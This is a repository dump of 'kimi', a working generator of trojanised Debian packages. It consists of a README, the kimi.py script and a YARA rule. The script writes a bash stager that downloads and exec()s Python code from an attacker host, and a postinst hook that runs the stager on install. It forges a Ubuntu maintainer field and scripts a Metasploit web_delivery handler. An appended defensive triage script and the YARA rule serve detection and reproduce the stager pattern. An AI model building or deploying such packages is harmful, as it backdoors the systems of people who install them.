├── MDPC.yara
├── README.md
├── kimi.py
└── screenshots
    ├── exploiting1.1.png
    └── kimi.PNG

/MDPC.yara:
--------------------------------------------------------------------------------
```yara
rule MDPC
{
    meta:
        author = "@bofheaded"
        date = "24/04/2019"
        description = "YARA rules for Kimi MDPC. Used in Venom Shellcode Generator too."
        sample = "f13196cf741c65115b0c350616fcba6d"
    strings:
        $hex = {C2 CC 26 A3 59 3A CD AA 9F}
    condition:
        $hex
}
```
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# kimi - Malicious Debian Package generator
Script to generate malicious Debian packages (Debian trojans).

# About & Plus points & Usage & Tested On :::
The name Kimi is inspired by "Kimimaro", one of my favourite characters from the anime "Naruto".

Kimi is a script which generates a malicious Debian package for Metasploit. The package consists of a bash file, which is deployed into the "/usr/local/bin/" directory.

The backdoor gets executed as soon as the victim installs the deb package, because of the postinst file.

The bash file is injected and also poses as a system command; when the victim executes it, the attacker gets a session.

Plus Points :
-- Fully independent. Means the user does not need to install any Debian package creator
-- Can be integrated with any payload generator easily due to its argument handling (lame :P i know)

Kimi basically depends upon the web_delivery module and everything is automated.
All the attacker needs to do is the following settings :

Setting up Web_Delivery in msf :

    msf > use exploit/multi/script/web_delivery
    msf exploit(web_delivery) > set srvhost 192.168.0.102
    srvhost => 192.168.0.102
    msf exploit(web_delivery) > set uripath /SecPatch
    uripath => /SecPatch
    msf exploit(web_delivery) > set Lhost 192.168.0.102
    Lhost => 192.168.0.102
    msf exploit(web_delivery) > show options
    msf exploit(web_delivery) > exploit

Generating Malicious payload :

    dreamer@mindless ~/Desktop/projects/kimi $ sudo python kimi.py -n nano -l 127.0.0.1 -V 1.0 -a i386

NOTE :: This project was made to be integrated with Venom Shellcode Generator 1.0.13.
It can be used standalone too; all the user needs to do is change uripath in the msf variables.
-------------------------------------------------------------------------------------

Tested on :
Linux Mint 17.2 Cinnamon (Ubuntu 14.04)
ParrotOS (Debian Jessie)
Kali Rolling 2.0

# Updates :::
[Feb-22-2017]
-- Added "postinst" file creation function to make embedded malicious file execution automated
-- Added RC file generation function to fully automate handler opening, meaning there is no need to
   set the handler manually
-- Patched some common bugs [special thanks to r00t 3xp10it :)]

[Oct-12-2017]
-- Added command line argument (-a/--arch) to select architecture (i386/amd64)

[April-24-2019] - Test Release.
-- Now custom URI and LPORT can be set
-- Python payload has been updated for python 2/3 and the latest version of Metasploit 5 too.
-- Whole code is re-implemented, though it still supports python 2.7

# ScreenShots :::

![Main Banner](https://raw.githubusercontent.com/ChaitanyaHaritash/kimi/master/screenshots/kimi.PNG)
![Kimi In Action](https://raw.githubusercontent.com/ChaitanyaHaritash/kimi/master/screenshots/exploiting1.1.png)

# Misc :::
Blog Post : http://hackinguyz.blogspot.in/2017/03/kimi-malicious-debian-package-creator.html
YouTube Video : https://youtu.be/Dsn6BRHy9_w
VirusTotal Sample (because I saw nasty use of this script in the wild): 7d91abb413c8cd3274f348ff12f244b9a503abfe018f138d34bbe2deab04472f

# Shouts to :::
Suspicious Shell Activity [Red Team]
# Doubts? Insults?
Twitter : @bofheaded
--------------------------------------------------------------------------------
/kimi.py:
--------------------------------------------------------------------------------
```python
#!/usr/bin/env python2

__version__ = "1.2"
#  ____  __. .__      .__
# |    |/ _| |__| _____ |__|
# |      <  |  | /     \|  |
# |    |  \ |  ||  Y Y  \  |
# |____|__ \|__||__|_|  /__|
#         \/         \./Suspicious Shell Activity
# Malicious Debain Package Creator
# Coded by Chaitanya Haritash
# Twitter :: @bofheaded

##
# Information :::

# Kimi is a script which generates Malicious debian package for metasploit
# which consists of bash file. the bash file is deployed into "/usr/local/bin/" directory.
# Bash file injects and acts like some system command which when executed by victim
# and attacker hits with session.

# Kimi basically depends upon web_delivery module and every thing is automated.
# all the attacker needs is to do following settings :

# NOTE :: This project was made to be integrated with Venom Shellcode Generator 1.0.13.
# It can be used standalone also all user needs is to change uripath in msf variables

# msf exploit(web_delivery) > set srvhost 192.168.0.102
# srvhost => 192.168.0.102
# msf exploit(web_delivery) > set uripath SecPatch
# uripath => SecPatch
# msf exploit(web_delivery) > set uripath /SecPatch
# uripath => /SecPatch
# msf exploit(web_delivery) > set Lhost 192.168.0.102
# Lhost => 192.168.0.102
# msf exploit(web_delivery) > show options
# msf exploit(web_delivery) > exploit

# Thanks r00t 3xpl0it for all corrections and ideas :) <3

##

import os, time, shutil
import argparse

banner = r"""
 ____  __. .__      .__
|    |/ _| |__| _____ |__|
|      <  |  | /     \|  |
|    |  \ |  ||  Y Y  \  |
|____|__ \|__||__|_|  /__|   Ver {0}
        \/         \./Suspicious Shell Activity
Malicious Debain Package Creator
Coded by Chaitanya Haritash
Twitter :: @bofheaded
""".format(__version__)

payload = """
#!/bin/bash
python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://lhost:8080/SecPatch');exec(r.read());"
"""

def mkpost(name):
    m = """
#!/bin/bash

chmod 2755 /usr/local/bin/"""+name.replace(".deb","")+""" && /usr/local/bin/"""+name.replace(".deb","")+""" &
"""
    return m

def make_deb(name,arch,name_ver,ver):
    gen = """
#!/bin/sh
chmod u+x """+name+"""
cat >> control << EOF

Package: """+name+"""
Version: """+ver+"""
Section: Games and Amusement
Priority: optional
Architecture: """+arch+"""
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: MDPC kimi (SSA-RedTeam development 2017)

EOF

mkdir -p """+name_ver+"""/usr/local/bin
cp """+name+""" """+name_ver+""" /usr/local/bin
mv /usr/local/bin/"""+name+""" /usr/local/bin/"""+name.replace(".deb","")+"""
sleep 2
mkdir -p """+name_ver+"""/DEBIAN
cp control """+name_ver+"""/DEBIAN/control
cp postinst """+name_ver+"""/DEBIAN/postinst
sleep 3
dpkg-deb --build """+name_ver+"""
"""
    os.system(gen)
    time.sleep(2)
    os.remove(name)
    os.remove("control")
    os.remove("postinst")
    shutil.rmtree(name_ver)
    print "All done!!"

def make_resource(lhost,uri):
    res = """
use exploit/multi/script/web_delivery
set SRVHOST """+lhost+"""
set LHOST """+lhost+"""
set URIPATH """+uri+"""
exploit
"""
    b = open("handler.rc" , "w").write(res)
    print "execute handler: sudo msfconsole -r handler.rc"
    time.sleep(2)
    os.system("chmod 777 handler.rc")
    os.system('xterm -e "sudo msfconsole -q -r handler.rc"')

def main():
    print banner
    parser = argparse.ArgumentParser()
    parser.add_argument('-n','--name', help="Name for your package" , required="true")
    parser.add_argument('-l','--lhost', help="LHOST, for Handler" , required="true")
    parser.add_argument('-p','--lport', help="LPORT for Handler" , required="true")
    parser.add_argument('-u','--uri', help="URI of handler" , required="true")
    parser.add_argument('-V','--vers', help="Version for package" , required="true")
    parser.add_argument('-a','--arch', help="Architecture (i386/amd64)" , required="true")
    go = parser.parse_args()
    if os.getuid() != 0:
        print "Script requires root privileges for certain operations, aborting"
    else:
        try:
            j = str(go.name)+"_"+str(go.vers)
            mkpay= payload.replace("lhost",go.lhost).replace("SecPatch",go.uri).replace("8080",go.lport)
            f = open(go.name,"w+").write(mkpay)
            mkpost_script = open("postinst","a").write(mkpost(go.name))
            os.system("chmod 0755 postinst")
            print "[+] Building the package : ",go.name
            time.sleep(2)
            make_deb(str(go.name),str(go.arch),str(j),str(go.vers))
            print "[+] msfconsole will start in few :)"
            make_resource(go.lhost,go.uri)
        except Exception as e:
            print "Something is not going good : ",e

if __name__ == '__main__':
    main()
```
--------------------------------------------------------------------------------
/screenshots/exploiting1.1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ChaitanyaHaritash/kimi/e7cafdad16d3cd5487d505e49dbeb1d4d8279f84/screenshots/exploiting1.1.png
--------------------------------------------------------------------------------
/screenshots/kimi.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ChaitanyaHaritash/kimi/e7cafdad16d3cd5487d505e49dbeb1d4d8279f84/screenshots/kimi.PNG
--------------------------------------------------------------------------------
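The README and kimi.py describe the whole delivery chain: a control file, a `postinst` that runs `chmod 2755` on a file dropped under `/usr/local/bin` and backgrounds it with `&`, and a bash stager that `urlopen()`s and `exec()`s remote code. The following is an added example, not part of the kimi repository, written from the defender's side: it parses a `.deb` as the ar archive it is, extracts the maintainer scripts from `control.tar.*` and the dropped files from `data.tar.*`, and reports those exact indicators. The two sample packages (a kimi-style one and a benign one) are constructed in memory; the package name `nano`, the address `lhost:8080/SecPatch` and the maintainer address are placeholders taken from or modelled on the page, and nothing is installed or executed.

```python
"""Triage a .deb for the maintainer-script pattern kimi's README describes (added example)."""
import io
import re
import sys
import tarfile

AR_MAGIC = b"!<arch>\n"

# Indicators modelled on the postinst and stager templates in kimi.py.
SCRIPT_INDICATORS = [
    (r"chmod\s+[0-7]*2755\s", "maintainer script sets setgid (2755) on a dropped file"),
    (r"/usr/local/bin/\S+\s*&", "maintainer script backgrounds a /usr/local/bin file"),
]
STAGER_INDICATORS = [
    (r"urlopen\(", "file under /usr/local/bin fetches code over HTTP"),
    (r"\bexec\(", "file under /usr/local/bin exec()s what it fetched"),
]


def _tar_gz(files):
    """Build a control.tar.gz / data.tar.gz in memory from {path: (mode, bytes)}."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for path, (mode, data) in files.items():
            info = tarfile.TarInfo(name=path)
            info.size, info.mode = len(data), mode
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def _ar_member(name, data):
    """One ar(1) member: 60-byte header, data, newline pad to an even offset."""
    header = "%-16s%-12s%-6s%-6s%-8s%-10s`\n" % (name, "0", "0", "0", "100644", len(data))
    return header.encode() + data + (b"\n" if len(data) % 2 else b"")


def build_constructed_deb(malicious=True):
    """Constructed sample (not a real package): kimi's layout, or a benign package."""
    if malicious:
        postinst = b"#!/bin/bash\n\nchmod 2755 /usr/local/bin/nano && /usr/local/bin/nano &\n"
        payload_path = "./usr/local/bin/nano"
        payload = (b"#!/bin/bash\npython -c \"import sys;u=__import__('urllib');"
                   b"r=u.urlopen('http://lhost:8080/SecPatch');exec(r.read());\"\n")
    else:
        postinst = b"#!/bin/sh\nset -e\nupdate-alternatives --install /usr/bin/editor editor /usr/bin/nano 40\n"
        payload_path = "./usr/bin/nano"
        payload = b"#!/bin/sh\necho 'placeholder editor'\n"
    control = (b"Package: nano\nVersion: 1.0\nArchitecture: i386\n"
               b"Maintainer: constructed@example.invalid\nDescription: constructed sample\n")
    return (AR_MAGIC
            + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", _tar_gz({"./control": (0o644, control), "./postinst": (0o755, postinst)}))
            + _ar_member("data.tar.gz", _tar_gz({payload_path: (0o755, payload)})))


def parse_ar(blob):
    """Return {member name: bytes} for a plain ar archive (the outer .deb container)."""
    if not blob.startswith(AR_MAGIC):
        raise ValueError("not an ar archive")
    pos, members = len(AR_MAGIC), {}
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        if hdr[58:] != b"`\n":
            raise ValueError("corrupt ar header at offset %d" % pos)
        name = hdr[:16].decode("ascii").strip().rstrip("/")
        size = int(hdr[48:58].decode("ascii").strip())
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)  # members start on even offsets
    return members


def _tar_files(blob):
    """Return {path without leading ./: bytes} for the regular files in a compressed tar."""
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:*") as tf:
        return {re.sub(r"^\.?/+", "", m.name): tf.extractfile(m).read()
                for m in tf.getmembers() if m.isfile()}


def inspect_deb(blob):
    """Return human-readable findings; an empty list means no indicator fired."""
    members = parse_ar(blob)
    control = _tar_files(next(d for n, d in members.items() if n.startswith("control.tar")))
    data = _tar_files(next(d for n, d in members.items() if n.startswith("data.tar")))
    findings = []
    for script in ("preinst", "postinst", "prerm", "postrm"):
        text = control.get(script, b"").decode("utf-8", "replace")
        findings += ["%s: %s" % (script, msg) for pat, msg in SCRIPT_INDICATORS if re.search(pat, text)]
    for path, content in data.items():
        if path.startswith("usr/local/bin/"):
            text = content.decode("utf-8", "replace")
            findings += ["/%s: %s" % (path, msg) for pat, msg in STAGER_INDICATORS if re.search(pat, text)]
    return findings


if __name__ == "__main__":
    # With a path argument, triage that package; otherwise run over the constructed samples.
    if len(sys.argv) > 1:
        samples = [(sys.argv[1], open(sys.argv[1], "rb").read())]
    else:
        samples = [("kimi-style", build_constructed_deb(True)), ("benign", build_constructed_deb(False))]
    for label, blob in samples:
        hits = inspect_deb(blob)
        print("%s: %d finding(s)" % (label, len(hits)))
        for hit in hits:
            print("  " + hit)
```

The check deliberately reads maintainer scripts and dropped files straight out of the archive rather than running `dpkg -i`, since the README's point is that the stager fires from `postinst` at install time; a package that trips the `/usr/local/bin` plus `urlopen`/`exec` combination is worth holding back for manual review regardless of how plausible its `Maintainer:` field looks.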